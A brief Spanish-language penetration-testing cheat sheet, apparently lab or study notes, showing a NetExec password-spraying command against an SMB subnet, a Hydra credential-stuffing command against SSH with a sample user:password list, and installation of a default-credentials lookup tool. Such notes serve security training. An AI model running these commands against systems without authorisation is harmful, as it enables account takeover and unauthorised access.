Spraying, Stuffing y Credenciales Predeterminadas

1️⃣ Pulverización de contraseñas (Password Spraying) 🧴

Ejemplo NetExec:

netexec smb 10.100.38.0/24 -u <usernames.list> -p 'ChangeMe123!

2️⃣ Relleno de credenciales (Credential Stuffing) 🧩

Ejemplo Hydra (SSH):

hydra -C user_pass.list ssh://10.100.38.23`

📄 Ejemplo de user_pass.list

admin:Admin123!
root:toor
jon:november
alice:Password1
bob:Qwerty2025
carla:ChangeMe123!
dave:dave2025
eve:eve@2025

3️⃣ Credenciales predeterminadas (Default Credentials) 🏷️

Ejemplo:

# Crear un entorno virtual
python3 -m venv ~/myvenv

# Activarlo
source ~/myvenv/bin/activate

# Ahora puedes instalar paquetes pip aquí sin afectar el sistema
pip install defaultcreds-cheat-sheet
creds search linksys